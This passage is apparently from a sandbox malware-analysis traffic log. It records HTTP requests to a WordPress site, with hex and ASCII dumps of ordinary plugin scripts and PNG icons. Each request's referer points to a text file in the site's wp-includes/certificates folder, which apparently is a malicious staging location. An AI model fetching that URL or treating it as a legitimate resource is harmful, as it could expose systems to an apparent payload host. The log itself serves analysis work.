                                        Data Ascii: controlNav.active(),m||d.slides.removeClass(e+"active-slide").eq(b).addClass(e+"active-slide"),d.atEnd=0===b||b===d.last,d.vars.directionNav&&p.directionNav.update(),b===d.last&&(d.vars.end(d),d.vars.animationLoop||d.pause()),n)g?(d.slides.eq(
                                        Aug 16, 2022 10:49:04.090487003 CEST1478OUTGET /wp-content/plugins/gtranslate/switcher.png HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:04.303447008 CEST1507INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:46:08 GMT
                                        Server: Apache
                                        ETag: "a50db1-cf-5c93d3867844d"
                                        Last-Modified: Tue, 10 Aug 2021 23:54:20 GMT
                                        Content-Length: 207
                                        Content-Type: image/png
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 18492619 23824773
                                        Age: 176
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0a 00 00 00 13 08 06 00 00 00 a9 eb 9c ee 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 16 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 30 31 2f 30 39 2f 31 30 dc b9 92 1f 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 34 06 b2 d3 a0 00 00 00 27 49 44 41 54 28 91 63 7c f7 ee dd 7f 06 22 00 0b 23 23 23 31 ea 86 84 42 26 a2 54 d1 c4 ea 51 85 d4 51 48 fd 28 04 00 35 2f 04 3f b8 1b 51 2d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRsBIT|dpHYs~tEXtCreation Time01/09/10tEXtSoftwareAdobe Fireworks CS4'IDAT(c|"###1B&TQQH(5/?Q-IENDB`
                                        Aug 16, 2022 10:49:04.305439949 CEST1507OUTGET /wp-content/plugins/gtranslate/arrow_down.png HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:04.519659996 CEST1564INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:46:08 GMT
                                        Server: Apache
                                        ETag: "a50de3-d0-5c93d38684b39"
                                        Last-Modified: Tue, 10 Aug 2021 23:54:20 GMT
                                        Content-Length: 208
                                        Content-Type: image/png
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 18492620 23824775
                                        Age: 176
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 05 00 00 00 03 08 06 00 00 00 5b 36 c5 f8 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 34 06 b2 d3 a0 00 00 00 16 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 30 31 2f 30 39 2f 31 30 dc b9 92 1f 00 00 00 28 49 44 41 54 08 99 5d c8 c1 0d 00 30 0c 83 40 a7 13 b3 89 47 a6 af 48 55 79 9d 98 b6 e6 eb 00 f3 0e 60 a2 46 4d 5b d7 17 94 fd 13 f2 5b d4 0b 67 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDR[6sBIT|dpHYs~tEXtSoftwareAdobe Fireworks CS4tEXtCreation Time01/09/10(IDAT]0@GHUy`FM[[gIENDB`
                                        Aug 16, 2022 10:49:04.602547884 CEST1632OUTGET /wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:04.823422909 CEST1645INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:16 GMT
                                        Server: Apache
                                        ETag: "a4f9ec-6fd-58592ebe62040"
                                        Last-Modified: Tue, 02 Apr 2019 21:35:53 GMT
                                        Content-Length: 1789
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 18492621 21534524
                                        Age: 48
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 2f 2f 20 4f 57 4c 20 43 61 72 6f 75 73 65 6c 20 69 6e 69 74 2e 0a 09 63 68 65 72 72 79 50 6c 75 67 69 6e 43 61 72 6f 75 73 65 6c 49 6e 69 74 28 29 3b 0a 0a 09 2f 2f 20 46 75 6c 6c 2d 77 69 64 74 68 20 62 6c 6f 63 6b 20 77 69 74 68 20 6c 65 66 74 2d 72 69 67 68 74 20 70 61 64 64 69 6e 67 73 2e 0a 09 6a 51 75 65 72 79 28 27 2e 63 6f 6e 74 65 6e 74 5f 62 6f 78 2e 66 75 6c 6c 2d 77 69 64 74 68 27 29 2e 77 72 61 70 49 6e 6e 65 72 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 75 6c 6c 2d 62 6c 6f 63 6b 2d 77 72 61 70 22 3e 3c 2f 64 69 76 3e 27 29 3b 0a 09 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 72 65 73 69 7a 65 28 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 63 6f 6e 74 65 6e 42 6f 78 52 65 73 69 7a 65 46 75 6e 63 74 69 6f 6e 28 29 3b 0a 09 7d 29 3b 0a 0a 09 63 6f 6e 74 65 6e 42 6f 78 52 65 73 69 7a 65 46 75 6e 63 74 69 6f 6e 28 29 3b 0a 09 66 75 6e 63 74 69 6f 6e 20 63 6f 6e 74 65 6e 42 6f 78 52 65 73 69 7a 65 46 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 76 61 72 20 77 69 64 74 68 5f 6f 66 5f 76 69 65 77 70 6f 72 74 20 3d 20 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 2c 0a 09 09 09 68 61 6c 66 5f 77 69 64 74 68 5f 6f 66 5f 76 69 65 77 70 6f 72 74 20 3d 20 77 69 64 74 68 5f 6f 66 5f 76 69 65 77 70 6f 72 74 20 2f 20 32 2c 0a 09 09 09 77 69 64 74 68 5f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 20 3d 20 6a 51 75 65 72 79 28 27 2e 63 6f 6e 74 65 6e 74 2d 68 6f 6c 64 65 72 20 3e 20 2e 63 6f 6e 74 61 69 6e 65 72 27 29 2e 77 69 64 74 68 28 29 3b 0a 0a 09 09 6a 51 75 65 72 79 28 27 2e 63 6f 6e 74 65 6e 74 5f 62 6f 78 2e 66 75 6c 6c 2d 77 69 64 74 68 27 29 2e 77 69 64 74 68 28 77 69 64 74 68 5f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 29 3b 0a 09 09 6a 51 75 65 72 79 28 27 2e 63 6f 6e 74 65 6e 74 5f 62 6f 78 2e 66 75 6c 6c 2d 77 69 64 74 68 27 29 2e 63 73 73 28 7b 27 70 61 64 64 69 6e 67 2d 6c 65 66 74 27 3a 20 68 61 6c 66 5f 77 69 64 74 68 5f 6f 66 5f 76 69 65 77 70 6f 72 74 2b 27 70 78 27 2c 20 27 70 61 64 64 69 6e 67 2d 72 69 67 68 74 27 3a 20 68 61 6c 66 5f 77 69 64 74 68 5f 6f 66 5f 76 69 65 77 70 6f 72 74 2b 27 70 78 27 2c 20 27 6d 61 72 67 69 6e 2d 6c 65 66 74 27 3a 20 27 2d 27 2b 68 61 6c 66 5f 77 69 64 74 68 5f 6f 66 5f 76 69 65 77 70 6f 72 74 2b 27 70 78 27 7d 29 3b 0a 09 09 6a 51 75 65 72 79 28 27 2e 66 75 6c 6c 2d 62 6c 6f 63 6b 2d 77 72 61 70 27 29 2e 77 69 64 74 68 28 77 69 64 74 68 5f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 29 3b 0a 09 7d 0a 7d 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 63 68 65 72 72 79 50 6c 75 67 69 6e 43 61 72 6f 75 73 65 6c 49 6e 69 74 28 29 20 7b 0a 09 6a 51 75 65 72 79 28 27 64 69 76 5b 69 64 5e 3d 22 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 2d 22 5d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 76 61 72 20 63 61 72 6f 75 73 65 6c 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2c 0a 09 09 09 61 75 74 6f 5f 70 6c 61 79 20 3d
                                        Data Ascii: jQuery(document).ready(function(){// OWL Carousel init.cherryPluginCarouselInit();// Full-width block with left-right paddings.jQuery('.content_box.full-width').wrapInner('<div class="full-block-wrap"></div>');jQuery(window).resize( function(){contenBoxResizeFunction();});contenBoxResizeFunction();function contenBoxResizeFunction(){var width_of_viewport = jQuery(window).width(),half_width_of_viewport = width_of_viewport / 2,width_of_container = jQuery('.content-holder > .container').width();jQuery('.content_box.full-width').width(width_of_container);jQuery('.content_box.full-width').css({'padding-left': half_width_of_viewport+'px', 'padding-right': half_width_of_viewport+'px', 'margin-left': '-'+half_width_of_viewport+'px'});jQuery('.full-block-wrap').width(width_of_container);}});function cherryPluginCarouselInit() {jQuery('div[id^="owl-carousel-"]').each(function(){var carousel = jQuery(this),auto_play =
                                        Aug 16, 2022 10:49:04.909359932 CEST1703OUTGET /wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:05.127378941 CEST1905INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:16 GMT
                                        Server: Apache
                                        ETag: "a4f8b7-570-58592c72eb640"
                                        Last-Modified: Tue, 02 Apr 2019 21:25:37 GMT
                                        Content-Length: 1392
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 18492622 21534526
                                        Age: 48
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 21 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 31 20 42 72 61 6e 64 6f 6e 20 41 61 72 6f 6e 20 28 68 74 74 70 3a 2f 2f 62 72 61 6e 64 6f 6e 61 61 72 6f 6e 2e 6e 65 74 29 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 4c 49 43 45 4e 53 45 2e 74 78 74 29 2e 0a 20 2a 0a 20 2a 20 54 68 61 6e 6b 73 20 74 6f 3a 20 68 74 74 70 3a 2f 2f 61 64 6f 6d 61 73 2e 6f 72 67 2f 6a 61 76 61 73 63 72 69 70 74 2d 6d 6f 75 73 65 2d 77 68 65 65 6c 2f 20 66 6f 72 20 73 6f 6d 65 20 70 6f 69 6e 74 65 72 73 2e 0a 20 2a 20 54 68 61 6e 6b 73 20 74 6f 3a 20 4d 61 74 68 69 61 73 20 42 61 6e 6b 28 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 74 68 69 61 73 2d 62 61 6e 6b 2e 64 65 29 20 66 6f 72 20 61 20 73 63 6f 70 65 20 62 75 67 20 66 69 78 2e 0a 20 2a 20 54 68 61 6e 6b 73 20 74 6f 3a 20 53 65 61 6d 75 73 20 4c 65 61 68 79 20 66 6f 72 20 61 64 64 69 6e 67 20 64 65 6c 74 61 58 20 61 6e 64 20 64 65 6c 74 61 59 0a 20 2a 0a 20 2a 20 56 65 72 73 69 6f 6e 3a 20 33 2e 30 2e 36 0a 20 2a 20 0a 20 2a 20 52 65 71 75 69 72 65 73 3a 20 31 2e 32 2e 32 2b 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 62 29 7b 76 61 72 20 63 3d 62 7c 7c 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2c 64 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 2c 65 3d 30 2c 66 3d 21 30 2c 67 3d 30 2c 68 3d 30 3b 72 65 74 75 72 6e 20 62 3d 61 2e 65 76 65 6e 74 2e 66 69 78 28 63 29 2c 62 2e 74 79 70 65 3d 22 6d 6f 75 73 65 77 68 65 65 6c 22 2c 63 2e 77 68 65 65 6c 44 65 6c 74 61 26 26 28 65 3d 63 2e 77 68 65 65 6c 44 65 6c 74 61 2f 31 32 30 29 2c 63 2e 64 65 74 61 69 6c 26 26 28 65 3d 2d 63 2e 64 65 74 61 69 6c 2f 33 29 2c 68 3d 65 2c 63 2e 61 78 69 73 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 63 2e 61 78 69 73 3d 3d 3d 63 2e 48 4f 52 49 5a 4f 4e 54 41 4c 5f 41 58 49 53 26 26 28 68 3d 30 2c 67 3d 2d 31 2a 65 29 2c 63 2e 77 68 65 65 6c 44 65 6c 74 61 59 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 68 3d 63 2e 77 68 65 65 6c 44 65 6c 74 61 59 2f 31 32 30 29 2c 63 2e 77 68 65 65 6c 44 65 6c 74 61 58 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 67 3d 2d 31 2a 63 2e 77 68 65 65 6c 44 65 6c 74 61 58 2f 31 32 30 29 2c 64 2e 75 6e 73 68 69 66 74 28 62 2c 65 2c 67 2c 68 29 2c 28 61 2e 65 76 65 6e 74 2e 64 69 73 70 61 74 63 68 7c 7c 61 2e 65 76 65 6e 74 2e 68 61 6e 64 6c 65 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 64 29 7d 76 61 72 20 62 3d 5b 22 44 4f 4d 4d 6f 75 73 65 53 63 72 6f 6c 6c 22 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 5d 3b 69 66 28 61 2e 65 76 65 6e 74 2e 66 69 78 48 6f 6f 6b 73 29 66 6f 72 28 76 61 72 20 63 3d 62 2e 6c 65 6e 67 74 68 3b 63 3b 29 61 2e 65 76 65 6e 74 2e 66 69 78 48 6f 6f 6b 73 5b 62 5b 2d 2d 63 5d 5d 3d 61 2e 65 76 65 6e 74 2e 6d 6f 75 73 65 48 6f 6f 6b 73 3b 61 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2e 6d 6f 75 73 65 77 68 65 65 6c 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69
                                        Data Ascii: /*! Copyright (c) 2011 Brandon Aaron (http://brandonaaron.net) * Licensed under the MIT License (LICENSE.txt). * * Thanks to: http://adomas.org/javascript-mouse-wheel/ for some pointers. * Thanks to: Mathias Bank(http://www.mathias-bank.de) for a scope bug fix. * Thanks to: Seamus Leahy for adding deltaX and deltaY * * Version: 3.0.6 * * Requires: 1.2.2+ */(function(a){function d(b){var c=b||window.event,d=[].slice.call(arguments,1),e=0,f=!0,g=0,h=0;return b=a.event.fix(c),b.type="mousewheel",c.wheelDelta&&(e=c.wheelDelta/120),c.detail&&(e=-c.detail/3),h=e,c.axis!==undefined&&c.axis===c.HORIZONTAL_AXIS&&(h=0,g=-1*e),c.wheelDeltaY!==undefined&&(h=c.wheelDeltaY/120),c.wheelDeltaX!==undefined&&(g=-1*c.wheelDeltaX/120),d.unshift(b,e,g,h),(a.event.dispatch||a.event.handle).apply(this,d)}var b=["DOMMouseScroll","mousewheel"];if(a.event.fixHooks)for(var c=b.length;c;)a.event.fixHooks[b[--c]]=a.event.mouseHooks;a.event.special.mousewheel={setup:function(){i
                                        Aug 16, 2022 10:49:05.130343914 CEST1906OUTGET /wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:05.347641945 CEST2307INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:17 GMT
                                        Server: Apache
                                        ETag: "a4f8bb-3b2-58592c72eb640"
                                        Last-Modified: Tue, 02 Apr 2019 21:25:37 GMT
                                        Content-Length: 946
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 18313620 21534528
                                        Age: 48
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 20 6a 71 75 65 72 79 2e 73 69 6d 70 6c 72 2e 73 6d 6f 6f 74 68 73 63 72 6f 6c 6c 20 76 65 72 73 69 6f 6e 20 31 2e 30 20 63 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 32 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 69 6d 6f 76 2f 73 69 6d 70 6c 72 2d 73 6d 6f 6f 74 68 73 63 72 6f 6c 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 2a 2f 0a 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 69 66 28 21 64 65 76 69 63 65 2e 6d 6f 62 69 6c 65 28 29 20 26 26 20 21 64 65 76 69 63 65 2e 74 61 62 6c 65 74 28 29 29 7b 0a 20 20 20 20 20 20 20 20 24 2e 73 72 53 6d 6f 6f 74 68 73 63 72 6f 6c 6c 28 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 65 70 3a 31 35 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 65 65 64 3a 38 30 30 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 0a 7d 29 3b 0a 0a 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 73 72 53 6d 6f 6f 74 68 73 63 72 6f 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 70 6c 61 74 66 6f 72 6d 20 3d 20 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 70 6c 61 74 66 6f 72 6d 3b 20 69 66 20 28 28 70 6c 61 74 66 6f 72 6d 20 3d 3d 3d 20 27 4d 61 63 49 6e 74 65 6c 27 20 7c 7c 20 70 6c 61 74 66 6f 72 6d 20 3d 3d 3d 20 27 4d 61 63 50 50 43 27 29 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 3b 20 76 61 72 20 6e 3d 65 2e 65 78 74 65 6e 64 28 7b 73 74 65 70 3a 31 37 30 2c 73 70 65 65 64 3a 31 30 30 30 2c 65 61 73 65 3a 22 73 77 69 6e 67 22 7d 2c 74 7c 7c 7b 7d 29 3b 76 61 72 20 72 3d 65 28 77 69 6e 64 6f 77 29 2c 69 3d 65 28 64 6f 63 75 6d 65 6e 74 29 2c 73 3d 30 2c 6f 3d 6e 2e 73 74 65 70 2c 75 3d 6e 2e 73 70 65 65 64 2c 61 3d 72 2e 68 65 69 67 68 74 28 29 2c 66 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 22 41 70 70 6c 65 57 65 62 4b 69 74 22 29 21 3d 3d 2d 31 3f 65 28 22 62 6f 64 79 22 29 3a 65 28 22 68 74 6d 6c 22 29 2c 6c 3d 66 61 6c 73 65 3b 65 28 22 62 6f 64 79 22 29 2e 6d 6f 75 73 65 77 68 65 65 6c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 3d 74 72 75 65 3b 69 66 28 74 3c 30 29 73 3d 73 2b 61 3e 3d 69 2e 68 65 69 67 68 74 28 29 3f 73 3a 73 2b 3d 6f 3b 65 6c 73 65 20 73 3d 73 3c 3d 30 3f 30 3a 73 2d 3d 6f 3b 66 2e 73 74 6f 70 28 29 2e 61 6e 69 6d 61 74 65 28 7b 73 63 72 6f 6c 6c 54 6f 70 3a 73 7d 2c 75 2c 6e 2e 65 61 73 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 3d 66 61 6c 73 65 7d 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 29 3b 72 2e 6f 6e 28 22 72 65 73 69 7a 65 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 3d 72 2e 68 65 69 67 68 74 28 29 7d 29 2e 6f 6e 28 22 73 63 72 6f 6c 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 6c 29 73 3d 72 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 7d 29 7d 7d 29 28 6a 51 75 65 72 79 29 3b 0a
                                        Data Ascii: /* jquery.simplr.smoothscroll version 1.0 copyright (c) 2012 https://github.com/simov/simplr-smoothscroll licensed under MIT */jQuery(document).ready(function($) { if(!device.mobile() && !device.tablet()){ $.srSmoothscroll({ step:150, speed:800 }); }});;(function(e){"use strict";e.srSmoothscroll=function(t){var platform = window.navigator.platform; if ((platform === 'MacIntel' || platform === 'MacPPC')){return false}; var n=e.extend({step:170,speed:1000,ease:"swing"},t||{});var r=e(window),i=e(document),s=0,o=n.step,u=n.speed,a=r.height(),f=navigator.userAgent.indexOf("AppleWebKit")!==-1?e("body"):e("html"),l=false;e("body").mousewheel(function(e,t){l=true;if(t<0)s=s+a>=i.height()?s:s+=o;else s=s<=0?0:s-=o;f.stop().animate({scrollTop:s},u,n.ease,function(){l=false});return false});r.on("resize",function(e){a=r.height()}).on("scroll",function(e){if(!l)s=r.scrollTop()})}})(jQuery);
                                        Aug 16, 2022 10:49:05.351169109 CEST2308OUTGET /wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:05.567416906 CEST2415INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:17 GMT
                                        Server: Apache
                                        ETag: "a4f8b3-ada-58592c72eb640"
                                        Last-Modified: Tue, 02 Apr 2019 21:25:37 GMT
                                        Content-Length: 2778
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 18313621 21534530
                                        Age: 48
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 21 20 64 65 76 69 63 65 2e 6a 73 20 30 2e 31 2e 35 38 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 3b 61 3d 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 2c 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 3d 7b 7d 2c 63 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 6a 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 64 65 76 69 63 65 2e 69 6f 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 28 29 7c 7c 64 65 76 69 63 65 2e 69 70 6f 64 28 29 7c 7c 64 65 76 69 63 65 2e 69 70 61 64 28 29 7d 2c 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 69 70 68 6f 6e 65 22 29 7d 2c 64 65 76 69 63 65 2e 69 70 6f 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 69 70 6f 64 22 29 7d 2c 64 65 76 69 63 65 2e 69 70 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 69 70 61 64 22 29 7d 2c 64 65 76 69 63 65 2e 61 6e 64 72 6f 69 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 61 6e 64 72 6f 69 64 22 29 7d 2c 64 65 76 69 63 65 2e 61 6e 64 72 6f 69 64 50 68 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 61 6e 64 72 6f 69 64 28 29 26 26 64 28 22 6d 6f 62 69 6c 65 22 29 7d 2c 64 65 76 69 63 65 2e 61 6e 64 72 6f 69 64 54 61 62 6c 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 61 6e 64 72 6f 69 64 28 29 26 26 21 64 28 22 6d 6f 62 69 6c 65 22 29 7d 2c 64 65 76 69 63 65 2e 62 6c 61 63 6b 62 65 72 72 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 62 6c 61 63 6b 62 65 72 72 79 22 29 7c 7c 64 28 22 62 62 31 30 22 29 7c 7c 64 28 22 72 69 6d 22 29 7d 2c 64 65 76 69 63 65 2e 62 6c 61 63 6b 62 65 72 72 79 50 68 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 62 6c 61 63 6b 62 65 72 72 79 28 29 26 26 21 64 28 22 74 61 62 6c 65 74 22 29 7d 2c 64 65 76 69 63 65 2e 62 6c 61 63 6b 62 65 72 72 79 54 61 62 6c 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 62 6c 61 63 6b 62 65 72 72 79 28 29 26 26 64 28 22 74 61 62 6c 65 74 22 29 7d 2c 64 65 76 69 63 65 2e 77 69 6e 64 6f 77 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 77 69 6e 64 6f 77 73 22 29 7d 2c 64 65 76 69 63 65 2e 